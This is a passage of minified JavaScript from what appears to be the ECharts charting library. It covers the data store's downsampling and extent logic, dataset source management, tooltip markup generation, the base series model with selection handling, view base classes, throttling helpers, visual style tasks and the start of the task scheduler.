this._updateDims(n,t,e),n},t.prototype.modify=function(t,e){this._updateDims(this,t,e)},t.prototype._updateDims=function(t,e,n){for(var i=t._chunks,r=[],o=e.length,a=t.count(),s=[],l=t._rawExtent,u=0;u<e.length;u++)l[e[u]]=Oa();for(var c=0;c<a;c++){for(var h=t.getRawIndex(c),p=0;p<o;p++)s[p]=i[e[p]][h];s[o]=c;var d=n&&n.apply(null,s);if(null!=d){"object"!=typeof d&&(r[0]=d,d=r);for(u=0;u<d.length;u++){var f=e[u],g=d[u],v=l[f],y=i[f];y&&(y[h]=g),g<v[0]&&(v[0]=g),g>v[1]&&(v[1]=g)}}}},t.prototype.lttbDownSample=function(t,e){var n,i,r,o=this.clone([t],!0),a=o._chunks[t],s=this.count(),l=0,u=Math.floor(1/e),c=this.getRawIndex(0),h=new(kv(this._rawCount))(Math.min(2*(Math.ceil(s/u)+2),s));h[l++]=c;for(var p=1;p<s-1;p+=u){for(var d=Math.min(p+u,s-1),f=Math.min(p+2*u,s),g=(f+d)/2,v=0,y=d;y<f;y++){var m=a[T=this.getRawIndex(y)];isNaN(m)||(v+=m)}v/=f-d;var _=p,x=Math.min(p+u,s),b=p-1,w=a[c];n=-1,r=_;var S=-1,M=0;for(y=_;y<x;y++){var T;m=a[T=this.getRawIndex(y)];isNaN(m)?(M++,S<0&&(S=T)):(i=Math.abs((b-g)*(m-w)-(b-y)*(v-w)))>n&&(n=i,r=T)}M>0&&M<x-_&&(h[l++]=Math.min(S,r),r=Math.max(S,r)),h[l++]=r,c=r}return h[l++]=this.getRawIndex(s-1),o._count=l,o._indices=h,o.getRawIndex=this._getRawIdx,o},t.prototype.minmaxDownSample=function(t,e){for(var n=this.clone([t],!0),i=n._chunks,r=Math.floor(1/e),o=i[t],a=this.count(),s=new(kv(this._rawCount))(2*Math.ceil(a/r)),l=0,u=0;u<a;u+=r){var c=u,h=o[this.getRawIndex(c)],p=u,d=o[this.getRawIndex(p)],f=r;u+r>a&&(f=a-u);for(var g=0;g<f;g++){var v=o[this.getRawIndex(u+g)];v<h&&(h=v,c=u+g),v>d&&(d=v,p=u+g)}var y=this.getRawIndex(c),m=this.getRawIndex(p);c<p?(s[l++]=y,s[l++]=m):(s[l++]=m,s[l++]=y)}return n._count=l,n._indices=s,n._updateGetRawIdx(),n},t.prototype.downSample=function(t,e,n,i){for(var r=this.clone([t],!0),o=r._chunks,a=[],s=Math.floor(1/e),l=o[t],u=this.count(),c=r._rawExtent[t]=[1/0,-1/0],h=new(kv(this._rawCount))(Math.ceil(u/s)),p=0,d=0;d<u;d+=s){s>u-d&&(s=u-d,a.length=s);for(var f=0;f<s;f++){var g=this.getRawIndex(d+f);a[f]=l[g]}var v=n(a),y=this.getRawIndex(Math.min(d+i(a,v)||0,u-1));l[y]=v,v<c[0]&&(c[0]=v),v>c[1]&&(c[1]=v),h[p++]=y}return r._count=p,r._indices=h,r._updateGetRawIdx(),r},t.prototype.each=function(t,e){if(this._count)for(var n=t.length,i=this._chunks,r=0,o=this.count();r<o;r++){var a=this.getRawIndex(r);switch(n){case 0:e(r);break;case 1:e(i[t[0]][a],r);break;case 2:e(i[t[0]][a],i[t[1]][a],r);break;default:for(var s=0,l=[];s<n;s++)l[s]=i[t[s]][a];l[s]=r,e.apply(null,l)}}},t.prototype.getDataExtent=function(t,e){var n=this._chunks[t],i=[1/0,-1/0];if(!n)return i;var r=this.count();if(!this._indices&&!e)return this._rawExtent[t].slice();var o=this._extent,a=o[t]||(o[t]={}),s=cv(e),l=s.key,u=a[l];if(u)return u.slice();for(var c=i[0],h=i[1],p=0;p<r;p++){var d=n[this.getRawIndex(p)];e&&!hv(s,d)||(d<c&&(c=d),d>h&&(h=d))}return a[l]=[c,h]},t.prototype.getRawDataItem=function(t){var e=this.getRawIndex(t);if(this._provider.persistent)return this._provider.getItem(e);for(var n=[],i=this._chunks,r=0;r<i.length;r++)n.push(i[r][e]);return n},t.prototype.clone=function(e,n){var i=new t,r=this._chunks,o=e&&F(e,function(t,e){return t[e]=!0,t},{});if(o)for(var a=0;a<r.length;a++)i._chunks[a]=o[a]?Cv(r[a]):r[a];else i._chunks=r;return this._copyCommonProps(i),n||(i._indices=this._cloneIndices()),i._updateGetRawIdx(),i},t.prototype._copyCommonProps=function(t){t._count=this._count,t._rawCount=this._rawCount,t._provider=this._provider,t._dimensions=this._dimensions,t._extent=C(this._extent),t._rawExtent=C(this._rawExtent)},t.prototype._cloneIndices=function(){if(this._indices){var t=this._indices.constructor,e=void 0;if(t===Array){var n=this._indices.length;e=new t(n);for(var i=0;i<n;i++)e[i]=this._indices[i]}else e=new t(this._indices);return e}return null},t.prototype._getRawIdxIdentity=function(t){return t},t.prototype._getRawIdx=function(t){return t<this._count&&t>=0?this._indices[t]:-1},t.prototype._updateGetRawIdx=function(){this.getRawIndex=this._indices?this._getRawIdx:this._getRawIdxIdentity},t.internalField=function(){function t(t,e,n,i){return lv(t[i],this._dimensions[i])}xv={arrayRows:t,objectRows:function(t,e,n,i){return lv(t[e],this._dimensions[i])},keyedColumns:t,original:function(t,e,n,i){var r=t&&(null==t.value?t:t.value);return lv(r instanceof Array?r[i]:r,this._dimensions[i])},typedArray:function(t,e,n,i){return t[i]}}}(),t}(),Av=function(){function t(t){this._sourceList=[],this._storeList=[],this._upstreamSignList=[],this._versionSignBase=0,this._dirty=!0,this._sourceHost=t}return t.prototype.dirty=function(){this._setLocalSource([],[]),this._storeList=[],this._dirty=!0},t.prototype._setLocalSource=function(t,e){this._sourceList=t,this._upstreamSignList=e,this._versionSignBase++,this._versionSignBase>9e10&&(this._versionSignBase=0)},t.prototype._getVersionSign=function(){return this._sourceHost.uid+"_"+this._versionSignBase},t.prototype.prepareSource=function(){this._isDirty()&&(this._createSource(),this._dirty=!1)},t.prototype._createSource=function(){this._setLocalSource([],[]);var t,e,n=this._sourceHost,i=this._getUpstreamSourceManagers(),r=!!i.length;if(Lv(n)){var o=n,a=void 0,s=void 0,l=void 0;if(r){var u=i[0];u.prepareSource(),a=(l=u.getSource()).data,s=l.sourceFormat,e=[u._getVersionSign()]}else s=J(a=o.get("data",!0))?_u:gu,e=[];var c=this._getSourceMetaRawOption()||{},h=l&&l.metaRawOption||{},p=at(c.seriesLayoutBy,h.seriesLayoutBy)||null,d=at(c.sourceHeader,h.sourceHeader),f=at(c.dimensions,h.dimensions);t=p!==h.seriesLayoutBy||!!d!=!!h.sourceHeader||f?[zg(a,{seriesLayoutBy:p,sourceHeader:d,dimensions:f},s)]:[]}else{var g=n;if(r){var v=this._applyTransform(i);t=v.sourceList,e=v.upstreamSignList}else{t=[zg(g.get("source",!0),this._getSourceMetaRawOption(),null)],e=[]}}this._setLocalSource(t,e)},t.prototype._applyTransform=function(t){var e,n=this._sourceHost,i=n.get("transform",!0),r=n.get("fromTransformResult",!0);if(null!=r){var o="";1!==t.length&&Ov(o)}var a,s=[],l=[];return E(t,function(t){t.prepareSource();var e=t.getSource(r||0),n="";null==r||e||Ov(n),s.push(e),l.push(t._getVersionSign())}),i?e=function(t,e){var n=da(t),i=n.length,r="";i||ua(r);for(var o=0,a=i;o<a;o++)e=mv(n[o],e),o!==a-1&&(e.length=Math.max(e.length,1));return e}(i,s,n.componentIndex):null!=r&&(e=[(a=s[0],new Ng({data:a.data,sourceFormat:a.sourceFormat,seriesLayoutBy:a.seriesLayoutBy,dimensionsDefine:C(a.dimensionsDefine),startIndex:a.startIndex,dimensionsDetectedCount:a.dimensionsDetectedCount}))]),{sourceList:e,upstreamSignList:l}},t.prototype._isDirty=function(){if(this._dirty)return!0;for(var t=this._getUpstreamSourceManagers(),e=0;e<t.length;e++){var n=t[e];if(n._isDirty()||this._upstreamSignList[e]!==n._getVersionSign())return!0}},t.prototype.getSource=function(t){t=t||0;var e=this._sourceList[t];if(!e){var n=this._getUpstreamSourceManagers();return n[0]&&n[0].getSource(t)}return e},t.prototype.getSharedDataStore=function(t){var e=t.makeStoreSchema();return this._innerGetDataStore(e.dimensions,t.source,e.hash)},t.prototype._innerGetDataStore=function(t,e,n){var i=this._storeList,r=i[0];r||(r=i[0]={});var o=r[n];if(!o){var a=this._getUpstreamSourceManagers()[0];Lv(this._sourceHost)&&a?o=a._innerGetDataStore(t,e,n):(o=new Dv).initData(new Wg(e,t.length),t),r[n]=o}return o},t.prototype._getUpstreamSourceManagers=function(){var t=this._sourceHost;if(Lv(t)){var e=Gf(t);return e?[e.getSourceManager()]:[]}return V(function(t){return t.get("transform",!0)||t.get("fromTransformResult",!0)?Pa(t.ecModel,"dataset",{index:t.get("fromDatasetIndex",!0),id:t.get("fromDatasetId",!0)},Da).models:[]}(t),function(t){return t.getSourceManager()})},t.prototype._getSourceMetaRawOption=function(){var t,e,n,i=this._sourceHost;if(Lv(i))t=i.get("seriesLayoutBy",!0),e=i.get("sourceHeader",!0),n=i.get("dimensions",!0);else if(!this._getUpstreamSourceManagers().length){var r=i;t=r.get("seriesLayoutBy",!0),e=r.get("sourceHeader",!0),n=r.get("dimensions",!0)}return{seriesLayoutBy:t,sourceHeader:e,dimensions:n}},t}();function Pv(t){t.option.transform&&dt(t.option.transform)}function Lv(t){return"series"===t.mainType}function Ov(t){throw new Error(t)}function Rv(t){var e=t.lineHeight;return null==e?"line-height:1":"line-height:"+ae(e+"")+"px"}function Nv(t,e){var n=t.color||Cf.color.tertiary,i=t.fontSize||12,r=t.fontWeight||"400",o=t.color||Cf.color.secondary,a=t.fontSize||14,s=t.fontWeight||"900";return"html"===e?{nameStyle:"font-size:"+ae(i+"")+"px;color:"+ae(n)+";font-weight:"+ae(r+""),valueStyle:"font-size:"+ae(a+"")+"px;color:"+ae(o)+";font-weight:"+ae(s+"")}:{nameStyle:{fontSize:i,fill:n,fontWeight:r},valueStyle:{fontSize:a,fill:o,fontWeight:s}}}var Bv=[0,10,20,30],zv=["","\n","\n\n","\n\n\n"];function Ev(t,e){return e.type=t,e}function Vv(t){return"section"===t.type}function Fv(t){return Vv(t)?Gv:Wv}function Hv(t){if(Vv(t)){var e=0,n=t.blocks.length,i=n>1||n>0&&!t.noHeader;return E(t.blocks,function(t){var n=Hv(t);n>=e&&(e=n+ +(i&&(!n||Vv(t)&&!t.noHeader)))}),e}return 0}function Gv(t,e,n,i){var r,o=e.noHeader,a=(r=Hv(e),{html:Bv[r],richText:zv[r]}),s=[],l=e.blocks||[];ct(!l||Y(l)),l=l||[];var u=t.orderMode;if(e.sortBlocks&&u){l=l.slice();var c={valueAsc:"asc",valueDesc:"desc"};if(wt(c,u)){var h=new uv(c[u],null);l.sort(function(t,e){return h.evaluate(t.sortParam,e.sortParam)})}else"seriesDesc"===u&&l.reverse()}E(l,function(n,r){var o=e.valueFormatter,l=Fv(n)(o?A(A({},t),{valueFormatter:o}):t,n,r>0?a.html:0,i);null!=l&&s.push(l)});var p="richText"===t.renderMode?s.join(a.richText):Zv(i,s.join(""),o?n:a.html);if(o)return p;var d=$d(e.header,"ordinal",t.useUTC),f=Nv(i,t.renderMode).nameStyle,g=Rv(i);return"richText"===t.renderMode?Yv(t,d,f)+a.richText+p:Zv(i,'<div style="'+f+";"+g+';">'+ae(d)+"</div>"+p,n)}function Wv(t,e,n,i){var r=t.renderMode,o=e.noName,a=e.noValue,s=!e.markerType,l=e.name,u=t.useUTC,c=e.valueFormatter||t.valueFormatter||function(t){return V(t=Y(t)?t:[t],function(t,e){return $d(t,Y(d)?d[e]:d,u)})};if(!o||!a){var h=s?"":t.markupStyleCreator.makeTooltipMarker(e.markerType,e.markerColor||Cf.color.secondary,r),p=o?"":$d(l,"ordinal",u),d=e.valueType,f=a?[]:c(e.value,e.rawDataIndex),g=!s||!o,v=!s&&o,y=Nv(i,r),m=y.nameStyle,_=y.valueStyle;return"richText"===r?(s?"":h)+(o?"":Yv(t,p,m))+(a?"":function(t,e,n,i,r){var o=[r],a=i?10:20;return n&&o.push({padding:[0,0,0,a],align:"right"}),t.markupStyleCreator.wrapRichTextStyle(Y(e)?e.join(" "):e,o)}(t,f,g,v,_)):Zv(i,(s?"":h)+(o?"":function(t,e,n){return'<span style="'+n+";"+(e?"margin-left:2px":"")+'">'+ae(t)+"</span>"}(p,!s,m))+(a?"":function(t,e,n,i){var r=n?"10px":"20px",o=e?"float:right;margin-left:"+r:"";return t=Y(t)?t:[t],'<span style="'+o+";"+i+'">'+V(t,function(t){return ae(t)}).join(" ")+"</span>"}(f,g,v,_)),n)}}function Uv(t,e,n,i,r,o){if(t)return Fv(t)({useUTC:r,renderMode:n,orderMode:i,markupStyleCreator:e,valueFormatter:t.valueFormatter},t,0,o)}function Zv(t,e,n){return'<div style="'+("margin: "+n+"px 0 0")+";"+Rv(t)+';">'+e+'<div style="clear:both"></div></div>'}function Yv(t,e,n){return t.markupStyleCreator.wrapRichTextStyle(e,n)}function Xv(t,e){var n=t.get("padding");return null!=n?n:"richText"===e?[8,10]:10}var jv=function(){function t(){this.richTextStyles={},this._nextStyleNameId=ta()}return t.prototype._generateStyleName=function(){return"__EC_aUTo_"+this._nextStyleNameId++},t.prototype.makeTooltipMarker=function(t,e,n){var i="richText"===n?this._generateStyleName():null,r=ef({color:e,type:t,renderMode:n,markerId:i});return j(r)?r:(this.richTextStyles[i]=r.style,r.content)},t.prototype.wrapRichTextStyle=function(t,e){var n={};Y(e)?E(e,function(t){return A(n,t)}):A(n,e);var i=this._generateStyleName();return this.richTextStyles[i]=n,"{"+i+"|"+t+"}"},t}();function qv(t){var e,n,i,r,o=t.series,a=t.dataIndex,s=t.multipleSeries,l=o.getData(),u=l.mapDimensionsAll("defaultedTooltip"),c=u.length,h=o.getRawValue(a),p=Y(h),d=function(t,e){return nf(t.getData().getItemVisual(e,"style")[t.visualDrawType])}(o,a);if(c>1||p&&!c){var f=function(t,e,n,i,r){var o=e.getData(),a=F(t,function(t,e,n){var i=o.getDimensionInfo(n);return t||i&&!1!==i.tooltip&&null!=i.displayName},!1),s=[],l=[],u=[];function c(t,e){var n=o.getDimensionInfo(e);n&&!1!==n.otherDims.tooltip&&(a?u.push(Ev("nameValue",{markerType:"subItem",markerColor:r,name:n.displayName,value:t,valueType:n.type})):(s.push(t),l.push(n.type)))}return i.length?E(i,function(t){c(ev(o,n,t),t)}):E(t,c),{inlineValues:s,inlineValueTypes:l,blocks:u}}(h,o,a,u,d);e=f.inlineValues,n=f.inlineValueTypes,i=f.blocks,r=f.inlineValues[0]}else if(c){var g=l.getDimensionInfo(u[0]);r=e=ev(l,a,u[0]),n=g.type}else r=e=p?h[0]:h;var v=wa(o),y=v&&o.name||"",m=l.getName(a),_=s?y:m;return Ev("section",{header:y,noHeader:s||!v,sortParam:r,blocks:[Ev("nameValue",{markerType:"item",markerColor:d,name:_,noName:!ht(_),value:e,valueType:n,rawDataIndex:l.getRawIndex(a)})].concat(i||[])})}var Kv=Ta();function $v(t,e){return t.getName(e)||t.getId(e)}var Qv=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e._selectedDataIndicesMap={},e}var i;return n(e,t),e.prototype.init=function(t,e,n){this.seriesIndex=this.componentIndex,this.dataTask=ov({count:ty,reset:ey}),this.dataTask.context={model:this},this.mergeDefaultAndTheme(t,n),(Kv(this).sourceManager=new Av(this)).prepareSource();var i=this.getInitialData(t,n);iy(i,this),this.dataTask.context.data=i,Kv(this).dataBeforeProcessed=i,Jv(this),this._initSelectedMapFromData(i)},e.prototype.mergeDefaultAndTheme=function(t,e){var n=bf(this),i=n?Sf(t):{},r=this.subType;kf.hasClass(r)&&(r+="Series"),I(t,e.getTheme().get(this.subType)),I(t,this.getDefaultOption()),fa(t,"label",["show"]),this.fillDataTextStyle(t.data),n&&wf(t,i,n)},e.prototype.mergeOption=function(t,e){t=I(this.option,t,!0),this.fillDataTextStyle(t.data);var n=bf(this);n&&wf(this.option,t,n);var i=Kv(this).sourceManager;i.dirty(),i.prepareSource();var r=this.getInitialData(t,e);iy(r,this),this.dataTask.dirty(),this.dataTask.context.data=r,Kv(this).dataBeforeProcessed=r,Jv(this),this._initSelectedMapFromData(r)},e.prototype.fillDataTextStyle=function(t){if(t&&!J(t))for(var e=["show"],n=0;n<t.length;n++)t[n]&&t[n].label&&fa(t[n],"label",e)},e.prototype.getInitialData=function(t,e){},e.prototype.appendData=function(t){this.getRawData().appendData(t.data)},e.prototype.getData=function(t){var e=oy(this);if(e){var n=e.context.data;return null!=t&&n.getLinkedData?n.getLinkedData(t):n}return Kv(this).data},e.prototype.getAllData=function(){var t=this.getData();return t&&t.getLinkedDataAll?t.getLinkedDataAll():[{data:t}]},e.prototype.setData=function(t){var e=oy(this);if(e){var n=e.context;n.outputData=t,e!==this.dataTask&&(n.data=t)}Kv(this).data=t},e.prototype.getEncode=function(){var t=this.get("encode",!0);if(t)return mt(t)},e.prototype.getSourceManager=function(){return Kv(this).sourceManager},e.prototype.getSource=function(){return this.getSourceManager().getSource()},e.prototype.getRawData=function(){return Kv(this).dataBeforeProcessed},e.prototype.getColorBy=function(){return this.get("colorBy")||"series"},e.prototype.isColorBySeries=function(){return"series"===this.getColorBy()},e.prototype.getBaseAxis=function(){var t=this.coordinateSystem;return t&&t.getBaseAxis&&t.getBaseAxis()},e.prototype.indicesOfNearest=function(t,e,n,i){var r=this.getData(),o=this.coordinateSystem,a=o&&o.getAxis(t);if(!o||!a)return[];var s=a.dataToCoord(n);null==i&&(i=1/0);for(var l=[],u=1/0,c=-1,h=0,p=r.getDimensionIndex(e),d=r.getStore(),f=0,g=d.count();f<g;f++){var v=d.get(p,f),y=s-a.dataToCoord(v),m=Math.abs(y);m<=i&&((m<u||m===u&&y>=0&&c<0)&&(u=m,c=y,h=0),y===c&&(l[h++]=f))}return l.length=h,l},e.prototype.formatTooltip=function(t,e,n){return qv({series:this,dataIndex:t,multipleSeries:e})},e.prototype.isAnimationEnabled=function(){var t=this.ecModel;if(r.node&&(!t||!t.ssr))return!1;var e=this.getShallow("animation");return e&&this.getData().count()>this.getShallow("animationThreshold")&&(e=!1),!!e},e.prototype.restoreData=function(){this.dataTask.dirty()},e.prototype.getColorFromPalette=function(t,e,n){var i=this.ecModel,r=$f.prototype.getColorFromPalette.call(this,t,e,n);return r||(r=i.getColorFromPalette(t,e,n)),r},e.prototype.coordDimToDataDim=function(t){return this.getRawData().mapDimensionsAll(t)},e.prototype.getProgressive=function(){return this.get("progressive")},e.prototype.getProgressiveThreshold=function(){return this.get("progressiveThreshold")},e.prototype.select=function(t,e){this._innerSelect(this.getData(e),t)},e.prototype.unselect=function(t,e){var n=this.option.selectedMap;if(n){var i=this.option.selectedMode,r=this.getData(e);if("series"===i||"all"===n)return this.option.selectedMap={},void(this._selectedDataIndicesMap={});for(var o=0;o<t.length;o++){var a=$v(r,t[o]);n[a]=!1,this._selectedDataIndicesMap[a]=-1}}},e.prototype.toggleSelect=function(t,e){for(var n=[],i=0;i<t.length;i++)n[0]=t[i],this.isSelected(t[i],e)?this.unselect(n,e):this.select(n,e)},e.prototype.getSelectedDataIndices=function(){if("all"===this.option.selectedMap)return[].slice.call(this.getData().getIndices());for(var t=this._selectedDataIndicesMap,e=W(t),n=[],i=0;i<e.length;i++){var r=t[e[i]];r>=0&&n.push(r)}return n},e.prototype.isSelected=function(t,e){var n=this.option.selectedMap;if(!n)return!1;var i=this.getData(e);return("all"===n||n[$v(i,t)])&&!i.getItemModel(t).get(["select","disabled"])},e.prototype.isUniversalTransitionEnabled=function(){if(this.__universalTransitionEnabled)return!0;var t=this.option.universalTransition;return!!t&&(!0===t||t&&t.enabled)},e.prototype._innerSelect=function(t,e){var n,i,r=this.option,o=r.selectedMode,a=e.length;if(o&&a)if("series"===o)r.selectedMap="all";else if("multiple"===o){$(r.selectedMap)||(r.selectedMap={});for(var s=r.selectedMap,l=0;l<a;l++){var u=e[l];s[h=$v(t,u)]=!0,this._selectedDataIndicesMap[h]=t.getRawIndex(u)}}else if("single"===o||!0===o){var c=e[a-1],h=$v(t,c);r.selectedMap=((n={})[h]=!0,n),this._selectedDataIndicesMap=((i={})[h]=t.getRawIndex(c),i)}},e.prototype._initSelectedMapFromData=function(t){if(!this.option.selectedMap){var e=[];t.hasItemOption&&t.each(function(n){var i=t.getRawDataItem(n);i&&i.selected&&e.push(n)}),e.length>0&&this._innerSelect(t,e)}},e.registerClass=function(t){return kf.registerClass(t)},e.protoInitialize=((i=e.prototype).type="series.__base__",i.seriesIndex=0,i.ignoreStyleOnData=!1,i.hasSymbolVisual=!1,i.defaultSymbol="circle",i.visualStyleAccessPath="itemStyle",void(i.visualDrawType="fill")),e}(kf);function Jv(t){var e=t.name;wa(t)||(t.name=function(t){var e=t.getRawData(),n=e.mapDimensionsAll("seriesName"),i=[];return E(n,function(t){var n=e.getDimensionInfo(t);n.displayName&&i.push(n.displayName)}),i.join(" ")}(t)||e)}function ty(t){return t.model.getRawData().count()}function ey(t){var e=t.model;return e.setData(e.getRawData().cloneShallow()),ny}function ny(t,e){e.outputData&&t.end>e.outputData.count()&&e.model.getRawData().cloneShallow(e.outputData)}function iy(t,e){E(_t(t.CHANGABLE_METHODS,t.DOWNSAMPLE_METHODS),function(n){t.wrapMethod(n,Z(ry,e))})}function ry(t,e){var n=oy(t);return n&&n.setOutputEnd((e||this).count()),e}function oy(t){var e=(t.ecModel||{}).scheduler,n=e&&e.getPipeline(t.uid);if(n){var i=n.currentTask;if(i){var r=i.agentStubMap;r&&(i=r.get(t.uid))}return i}}B(Qv,iv),B(Qv,$f),Qa(Qv,kf);var ay=function(){function t(){this.group=new ho,this.uid=nd("viewComponent")}return t.prototype.init=function(t,e){},t.prototype.render=function(t,e,n,i){},t.prototype.dispose=function(t,e){},t.prototype.updateView=function(t,e,n,i){},t.prototype.updateLayout=function(t,e,n,i){},t.prototype.updateVisual=function(t,e,n,i){},t.prototype.toggleBlurSeries=function(t,e,n){},t.prototype.eachRendered=function(t){var e=this.group;e&&e.traverse(t)},t}();function sy(){var t=Ta();return function(e){var n=t(e),i=e.pipelineContext,r=!!n.large,o=!!n.progressiveRender,a=n.large=!(!i||!i.large),s=n.progressiveRender=!(!i||!i.progressiveRender);return!(r===a&&o===s)&&"reset"}}$a(ay),ns(ay);var ly=Ta(),uy=sy(),cy=function(){function t(){this.group=new ho,this.uid=nd("viewChart"),this.renderTask=ov({plan:dy,reset:fy}),this.renderTask.context={view:this}}return t.prototype.init=function(t,e){},t.prototype.render=function(t,e,n,i){0},t.prototype.highlight=function(t,e,n,i){var r=t.getData(i&&i.dataType);r&&py(r,i,"emphasis")},t.prototype.downplay=function(t,e,n,i){var r=t.getData(i&&i.dataType);r&&py(r,i,"normal")},t.prototype.remove=function(t,e){this.group.removeAll()},t.prototype.dispose=function(t,e){},t.prototype.updateView=function(t,e,n,i){this.render(t,e,n,i)},t.prototype.updateVisual=function(t,e,n,i){this.render(t,e,n,i)},t.prototype.eachRendered=function(t){_p(this.group,t)},t.markUpdateMethod=function(t,e){ly(t).updateMethod=e},t.protoInitialize=void(t.prototype.type="chart"),t}();function hy(t,e,n){t&&yc(t)&&("emphasis"===e?Qu:Ju)(t,n)}function py(t,e,n){var i=Ma(t,e),r=e&&null!=e.highlightKey?function(t){var e=ku[t];return null==e&&Tu<=32&&(e=ku[t]=Tu++),e}(e.highlightKey):null;null!=i?E(da(i),function(e){hy(t.getItemGraphicEl(e),n,r)}):t.eachItemGraphicEl(function(t){hy(t,n,r)})}function dy(t){return uy(t.model)}function fy(t){var e=t.model,n=t.ecModel,i=t.api,r=t.payload,o=e.pipelineContext.progressiveRender,a=t.view,s=r&&ly(r).updateMethod,l=o?"incrementalPrepareRender":s&&a[s]?s:"render";return"render"!==l&&a[l](e,n,i,r),gy[l]}$a(cy),ns(cy);var gy={incrementalPrepareRender:{progress:function(t,e){e.view.incrementalRender(t,e.model,e.ecModel,e.api,e.payload)}},render:{forceFirstProgress:!0,progress:function(t,e){e.view.render(e.model,e.ecModel,e.api,e.payload)}}},vy="\0__throttleOriginMethod",yy="\0__throttleRate",my="\0__throttleType";function _y(t,e,n){var i,r,o,a,s,l=0,u=0,c=null;function h(){u=(new Date).getTime(),c=null,t.apply(o,a||[])}e=e||0;var p=function(){for(var t=[],p=0;p<arguments.length;p++)t[p]=arguments[p];i=(new Date).getTime(),o=this,a=t;var d=s||e,f=s||n;s=null,r=i-(f?l:u)-d,clearTimeout(c),f?c=setTimeout(h,d):r>=0?h():c=setTimeout(h,-r),l=i};return p.clear=function(){c&&(clearTimeout(c),c=null)},p.debounceNextCall=function(t){s=t},p}function xy(t,e,n,i){var r=t[e];if(r){var o=r[vy]||r,a=r[my];if(r[yy]!==n||a!==i){if(null==n||!i)return t[e]=o;(r=t[e]=_y(o,n,"debounce"===i))[vy]=o,r[my]=i,r[yy]=n}return r}}function by(t,e){var n=t[e];n&&n[vy]&&(n.clear&&n.clear(),t[e]=n[vy])}var wy=Ta(),Sy={itemStyle:is($p,!0),lineStyle:is(jp,!0)},My={lineStyle:"stroke",itemStyle:"fill"};function Ty(t,e){var n=t.visualStyleMapper||Sy[e];return n||(console.warn("Unknown style type '"+e+"'."),Sy.itemStyle)}function ky(t,e){var n=t.visualDrawType||My[e];return n||(console.warn("Unknown style type '"+e+"'."),"fill")}var Cy={createOnAllSeries:!0,performRawSeries:!0,reset:function(t,e){var n=t.getData(),i=t.visualStyleAccessPath||"itemStyle",r=t.getModel(i),o=Ty(t,i)(r),a=r.getShallow("decal");a&&(n.setVisual("decal",a),a.dirty=!0);var s=ky(t,i),l=o[s],u=X(l)?l:null,c="auto"===o.fill||"auto"===o.stroke;if(!o[s]||u||c){var h=t.getColorFromPalette(t.name,null,e.getSeriesCount());o[s]||(o[s]=h,n.setVisual("colorFromPalette",!0)),o.fill="auto"===o.fill||X(o.fill)?h:o.fill,o.stroke="auto"===o.stroke||X(o.stroke)?h:o.stroke}if(n.setVisual("style",o),n.setVisual("drawType",s),!e.isSeriesFiltered(t)&&u)return n.setVisual("colorFromPalette",!1),{dataEach:function(e,n){var i=t.getDataParams(n),r=A({},o);r[s]=u(i),e.setItemVisual(n,"style",r)}}}},Iy=new td,Dy={createOnAllSeries:!0,reset:function(t,e){if(!t.ignoreStyleOnData){var n=t.getData(),i=t.visualStyleAccessPath||"itemStyle",r=Ty(t,i),o=n.getVisual("drawType");return{dataEach:n.hasItemOption?function(t,e){var n=t.getRawDataItem(e);if(n&&n[i]){Iy.option=n[i];var a=r(Iy);A(t.ensureUniqueItemVisual(e,"style"),a),Iy.option.decal&&(t.setItemVisual(e,"decal",Iy.option.decal),Iy.option.decal.dirty=!0),o in a&&t.setItemVisual(e,"colorFromPalette",!1)}}:null}}}},Ay={performRawSeries:!0,overallReset:function(t){var e=mt();t.eachSeries(function(t){if(!t.isColorBySeries()){var n=t.type+"-"+t.getColorBy();wy(t).scope=e.get(n)||e.set(n,{})}}),t.eachSeries(function(t){if(!t.isColorBySeries()){var e=t.getRawData(),n={},i=t.getData(),r=wy(t).scope,o=t.visualStyleAccessPath||"itemStyle",a=ky(t,o);i.each(function(t){var e=i.getRawIndex(t);n[e]=t}),e.each(function(o){var s=n[o];if(i.getItemVisual(s,"colorFromPalette")){var l=i.ensureUniqueItemVisual(s,"style"),u=e.getName(o)||o+"",c=e.count();l[a]=t.getColorFromPalette(u,r,c)}})}})}},Py=Math.PI;var Ly=function(){function t(t,e,n,i){this._stageTaskMap=mt(),this.ecInstance=t,this.api=e,n=this._dataProcessorHandlers=n.slice(),i=this._visualHandlers=i.slice(),this._allHandlers=n.concat(i)}return t.prototype.restoreData=function(t,e){t.restoreData(e),this._stageTaskMap.each(function(t){var e=t.overallTask;e&&e.dirty()})},t.prototype.getPerformArgs=function(t,e){if(t.__pipeline){var n=this._pipelineMap.get(t.__pipeline.id),i=n.context,r=!e&&n.progressiveEnabled&&(!i||i.progressiveRender)&&t.__idxInPipeline>n.blockIndex?n.step:null,o=i&&i.modDataCount;return{step:r,modBy:null!=o?Math.ceil(o/r):null,modDataCount:o}}},t.prototype.getPipeline=function(t){return this._pipelineMap.get(t)},t.prototype.updateStreamModes=function(t,e){var n=this._pipelineMap.get(t.uid),i=t.__preparePipelineContext?t.__preparePipelineContext(e,n):Ya(t,e,n);t.pipelineContext=n.context=i},t.prototype.restorePipelines=function(t,e){var n=this,i=n._pipelineMap=mt();e.eachSeries(function(e){var r="canvas"===t.painter.type&&e.getProgressive(),o=e.uid;i.set(o,{id:o,head:null,tail:null,threshold:e.getProgressiveThreshold(),progressiveEnabled:r&&!(e.preventIncremental&&e.preventIncremental()),blockIndex:-1,step:Math.round(r||700),count:0}),n._pipe(e,e.dataTask)})},t.prototype.prepareStageTasks=function(){var t=this._stageTaskMap,e=this.api.getModel(),n=this.api;E(this._allHandlers,function(i){var r=t.get(i.uid)||t.set(i.uid,{}),o="";ct(!(i.reset&&i.overallReset),o),i.reset&&this._createSeriesStageTask(i,r,e,n),i.overallReset&&this._createOverallStageTask(i,r,e,n)},this)},t.prototype.prepareView=function(t,e,n,i){var r=t.renderTask,o=r.context;o.model=e,o.ecModel=n,o.api=i,r.__block=!t.incrementalPrepareRender,this._pipe(e,r)},t.prototype.performDataProcessorTasks=function(t,e){this._performStageTasks(this._dataProcessorHandlers,t,e,{block:!0})},t.prototype.performVisualTasks=function(t,e,n){this._performStageTasks(this._visualHandlers,t,e,n)},t.prototype._performStageTasks=function(t,e,n,i){i=i||{};var r=!1,o=this;function a(t,e){return t.setDirty&&(!t.dirtyMap||t.dirtyMap.get(e.__pipeline.id))}E(t,function(t,s){if(!i.visualType||i.visualType===t.visualType){var l=o._stageTaskMap.get(t.uid),u=l.seriesTaskMap,c=l.overallTask;if(c){var 